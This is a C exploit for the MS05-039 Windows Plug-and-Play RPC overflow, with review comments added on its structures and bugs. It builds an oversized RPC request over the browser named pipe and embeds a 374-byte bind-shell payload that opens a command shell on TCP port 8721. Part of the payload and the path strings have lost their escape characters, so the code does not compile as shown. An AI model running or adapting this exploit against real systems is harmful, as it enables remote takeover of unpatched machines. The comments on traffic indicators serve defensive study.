# Title : MS Windows Plug-and-Play Service Remote Overflow (MS05-039)
# Published : 2005-08-11
# Author : sl0ppy
/*
Windows 2000 universal exploit for MS05-039
-x6dx35x6cx30x6ex6ex79-
*/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
/*
 * Template for the request body that Attack() copies over struct DataStruct1.
 * It is only 0x68 bytes long, but Attack() copies sizeof(struct DataStruct1)
 * (0x30 + 6*4 + 0x7D0 + 3*4 = 0x824 bytes) out of it, so that copy reads far
 * past the end of this array (undefined behaviour). The stray bytes all land
 * in SDA, LRD, MB and DM, which Attack() rewrites before sending.
 *
 * Bytes 0x00-0x2F: three little-endian DWORDs (0x11, 0, 0x11) followed by the
 * UTF-16LE text "ROOT\SYSTEM\0000" (16 characters + NUL = 0x11 units); this is
 * consistent with an NDR conformant/varying string, not verified here.
 * Bytes 0x30-0x47 line up with the six DWORD fields that follow SomeString
 * (RESDataType = 0x21, SDO = 0xEEEEEEEE, the rest zero; LFD and SDL are
 * overwritten by Attack()).
 */
BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
/*
 * Layout of the request body Attack() sends to opnum 54 of the interface
 * bound in main(). The field abbreviations are the author's and are not
 * expanded anywhere in this file. Attack() assigns SDL, LFD, LRD, MB and DM
 * by name and fills the SDA byte array; every other member keeps the bytes
 * copied in from Data1.
 * Every member is a multiple of 4 bytes, so there is no padding and
 * sizeof(struct DataStruct1) == 0x824.
 */
struct DataStruct1
{
BYTE SomeString[0x30];  // raw NDR string bytes from Data1 (see the comment there)
DWORD RESDataType;      // 0x21 from Data1
DWORD LFD;              // set to 0x7E0 by Attack()
DWORD SDM1;
DWORD SDO;              // 0xEEEEEEEE from Data1
DWORD SDL;              // set to 0x7C0 by Attack()
DWORD SDM2;
BYTE SDA[0x07D0];       // 0x90 filler, 4 literal bytes at offset 76, payload at offset 94
DWORD LRD;              // set to 0x7E0 by Attack()
DWORD MB;               // set to 4 by Attack()
DWORD DM;               // set to 0 by Attack()
};
/*
 * Host-side view of a DCE/RPC bind PDU. PRPC (0x48 bytes) is memcpy'd over
 * this struct in BindRpcInterface() and the struct is then sent verbatim.
 *
 * NOTE(review): the struct size depends on compiler padding. With the usual
 * natural alignment it also comes to 0x48 bytes (1 pad byte after
 * NumCtxItems, 2 pad bytes before InterfaceUUID), which is what makes the
 * whole-struct memcpy/TransactNamedPipe round trip work; the named offsets of
 * ContextID and NumTransItems are therefore not guaranteed to be the on-wire
 * ones - verify with offsetof() before relying on them. Only InterfaceUUID,
 * InterfaceVerMaj and InterfaceVerMin are ever accessed by name.
 */
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;        // PRPC carries 0x0B here
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;        // PRPC carries 0x0048
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;       // implicit padding follows (see note above)
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;     // replaced by BindRpcInterface() from its string argument
WORD InterfaceVerMaj;   // set by BindRpcInterface()
WORD InterfaceVerMin;   // set by BindRpcInterface()
GUID TransferSyntax;
DWORD SyntaxVer;
};
//from metasploit, before you were born
/*
 * 374-byte x86 payload that the author attributes to Metasploit; the banner
 * printed by Attack() says it listens on TCP port 8721.
 * NOTE(review): as reproduced on this page the initializer is a plain string
 * of "xNN" text (its backslash escapes have not survived transcription), so it
 * is well over 1100 characters for a 374-byte array and does not compile as
 * shown. Attack() copies exactly 374 bytes of it into SDA.
 */
BYTE BindShell[374]={"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"
"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"
"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"
"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"
"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"
"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"
"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"
"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"
"x89xe5xe8x27x00x00x00x90x01x00x00xb6x19x18xe7xa4"
"x19x70xe9xe5x49x86x49xa4x1ax70xc7xa4xadx2exe9xd9"
"x09xf5xadxcbxedxfcx3bx57x53x32x5fx33x32x00x5bx8d"
"x4bx20x51xffxd7x89xdfx89xc3x8dx75x14x6ax07x59x51"
"x53xffx34x8fxffx55x04x59x89x04x8exe2xf2x2bx27x54"
"xffx37xffx55x30x31xc0x50x50x50x50x40x50x40x50xff"
"x55x2cx89xc7x31xdbx53x53x68x02x00x22x11x89xe0x6a"
"x10x50x57xffx55x24x53x57xffx55x28x53x54x57xffx55"
"x20x89xc7x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7c"
"x24xacx6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10"
"x44x66xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4c"
"x89x7cx24x50x8dx44x24x10x54x50x51x51x51x41x51x49"
"x51x51x53x51xffx75x00x68x72xfexb3x16xffx55x04xff"
"xd0x89xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3"
"x6axffxffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55"
"x04x31xdbx53xffxd0"};
/*
 * Raw bind PDU template (0x48 bytes) that BindRpcInterface() memcpy's over
 * struct RPCBIND. The leading bytes read as RPC version 5.0, packet type 0x0B
 * (bind), flags 0x03, frag length 0x0048, call id 1, max xmit/recv frag 0x10B8
 * and one context item. The 16-byte GUID at offset 0x20 is the interface UUID
 * placeholder that BindRpcInterface() replaces; the GUID at offset 0x34 with
 * version 2 at 0x44 is the transfer syntax and is sent unchanged.
 */
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
/*
 * Host-side view of a DCE/RPC request PDU header (24 bytes, no padding:
 * 4 bytes + DWORD + 2 WORDs + 2 DWORDs + 2 WORDs). Attack() fills it from
 * POP and then sets FragLength, AllocHint and Opnum by name; the struct is
 * sent verbatim immediately followed by the DataStruct1 body.
 */
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;        // POP carries 0x00 here
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;        // header + body length, set by Attack()
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;        // body length, set by Attack()
WORD ContextID;
WORD Opnum;             // set to 54 by Attack()
};
/*
 * Raw request PDU template (0x27 bytes). Attack() copies only the first
 * sizeof(struct RPCFUNC) == 24 bytes of it and then overwrites FragLength
 * (0x10AC here), AllocHint (0x1094 here) and Opnum (9 here); the trailing
 * 15 bytes starting at 0x05,0x08 are never read.
 */
BYTE POP[0x27] =
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00,
0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00,
0x05,0x08,0x00,0x00,0x41,0x00,0x41};
/*
 * Send a DCE/RPC bind for one interface over an already-open named pipe.
 *
 * PH           - pipe handle returned by CreateFile() in main(); never validated here
 * Interface    - interface UUID as a string ("xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx")
 * InterfaceVer - version as "M.m"; only the characters at index 0 and 2 are read
 *
 * Returns 0 unconditionally. None of the RPC or Win32 calls below is checked,
 * so a malformed UUID, a broken pipe or a rejected bind all go unnoticed and
 * the caller proceeds anyway.
 */
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000];
DWORD dw;
struct RPCBIND RPCBind;
// Start from the canned bind PDU; relies on sizeof(RPCBind) == sizeof(PRPC) == 0x48.
memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
// Return status ignored: an unparsable Interface string is not detected.
UuidFromString(Interface,&RPCBind.InterfaceUUID);
// NOTE(review): this allocates a fresh string and stores its pointer over the
// local `Interface`; the result is never used and never released with
// RpcStringFree(), so the call is a leak with no effect on the bind.
UuidToString(&RPCBind.InterfaceUUID,&Interface);
// "1.0" -> major 1, minor 0. atoi() stops at the '.'; no format validation,
// and InterfaceVer shorter than 3 characters reads past its terminator.
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
// Whatever the server answers (bind_ack or otherwise) lands in rbuf and is
// discarded along with the BOOL result and dw.
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL);
return 0;
}
/*
 * Build the oversized opnum-54 request for the bound interface and send it
 * over the pipe as one fragment (24-byte request header + 0x824-byte body).
 *
 * PipeHandle - pipe handle from main(), already bound by BindRpcInterface()
 *
 * Returns 0 unconditionally; malloc() and TransactNamedPipe() are not checked.
 *
 * Detection note: on the wire this is a named-pipe transaction on
 * \pipe\browser carrying a single RPC request with opnum 54 and a ~0x83C-byte
 * fragment that is mostly 0x90 bytes; the printed banner says the payload
 * then listens on TCP 8721, which is a second host/network indicator.
 */
int Attack(HANDLE PipeHandle)
{
struct RPCFUNC RPCOP;
int bwritten=0;         // unused
BYTE *LargeBuffer;
BYTE rbuf[0x100];
DWORD dw;
struct DataStruct1 EvilRPC;
// BUG: Data1 is 0x68 bytes but sizeof(EvilRPC) is 0x824, so this reads
// 0x7BC bytes past the end of Data1 (undefined behaviour). The bytes read
// out of bounds fall in SDA, LRD, MB and DM, all of which are rewritten
// below, so they never reach the wire - but the read itself is still UB.
memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
EvilRPC.SDL=0x07C0;
// Fill the whole 0x7D0-byte SDA region with 0x90.
memset(EvilRPC.SDA,0x90,0x07D0);
// Four literal bytes at offset 76 (little-endian 0x75021E3E); presumably the
// Windows 2000-specific address the header comment refers to - not derivable
// from this file, so the "universal" claim cannot be checked here.
EvilRPC.SDA[76]=0x3e;
EvilRPC.SDA[77]=0x1e;
EvilRPC.SDA[78]=0x02;
EvilRPC.SDA[79]=0x75;
// Redundant: SDA[80..90] are already 0x90 from the memset above.
memset(EvilRPC.SDA+80,0x90,10);
EvilRPC.SDA[90]=0x90;
// Payload at SDA offset 94; 94 + 374 = 468 bytes, well inside the 0x7D0 region.
memcpy(EvilRPC.SDA+94,BindShell,374);
EvilRPC.MB=0x00000004;
EvilRPC.DM=0x00000000;
EvilRPC.LFD=0x000007E0;
EvilRPC.LRD=0x000007E0;
// Request header from the first 24 bytes of POP, then patch the three fields
// that depend on this body.
memcpy(&RPCOP,&POP,sizeof(RPCOP));
RPCOP.Opnum = 54;
RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);  // 0x18 + 0x824 = 0x83C, truncated to WORD
RPCOP.AllocHint=sizeof(EvilRPC);
// malloc() result is not checked; a NULL here is dereferenced by the memset.
LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
// The memset is redundant: the two memcpy calls cover the buffer exactly.
memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
// NOTE(review): the line breaks in this message appear as bare 'n' on this
// page; the escape sequences have not survived transcription.
printf("Sending payload...nThis has to time out... ctrl+c after 5 secsncheck for shell on port 8721");
// The banner above says this call is expected to block until it times out;
// its BOOL result, the reply in rbuf and dw are all discarded.
TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
free(LargeBuffer);
return 0;
}
/*
 * Entry point: add an anonymous network connection to the target's pipe
 * share, open the browser named pipe, bind the interface named below and
 * hand the pipe to Attack().
 *
 * argv[1] - target host name or address; no further arguments are read
 *
 * Returns 1 on a usage error, otherwise 0 regardless of whether any of the
 * network calls succeeded (none of them is checked).
 */
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc < 2)
{
printf("Usage: %s <host>n", argv[0]);
return 1;
}
server=argv[1];
// NOTE(review): as transcribed, this and the szPipe format string read with
// single backslashes ("\p" is not a C escape); the literals on this page do
// not form a valid UNC path as shown.
_snprintf(unc, sizeof(unc), "\\%s\pipe", server);
// _snprintf() does not NUL-terminate on truncation, so force it here;
// szPipe below gets no equivalent guard.
unc[sizeof(unc)-1] = 0;
// Only four NETRESOURCE members are set; the remaining members are left
// uninitialized. Presumably WNetAddConnection2() reads just these four for
// a non-persistent connection - confirm against the API documentation.
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
// Empty user name and password, i.e. an anonymous session; the return value
// is ignored and the connection is never cancelled with WNetCancelConnection2().
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe), "\\%s\pipe\browser",server);
// hFile is never compared with INVALID_HANDLE_VALUE and never closed; on
// failure the two calls below run against an invalid handle.
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
// Bind the interface the MS05-039 title refers to, version 1.0.
BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0");
// Send the malformed RPC request.
Attack(hFile);
return 0;
}
// www.Syue.com [2005-08-11]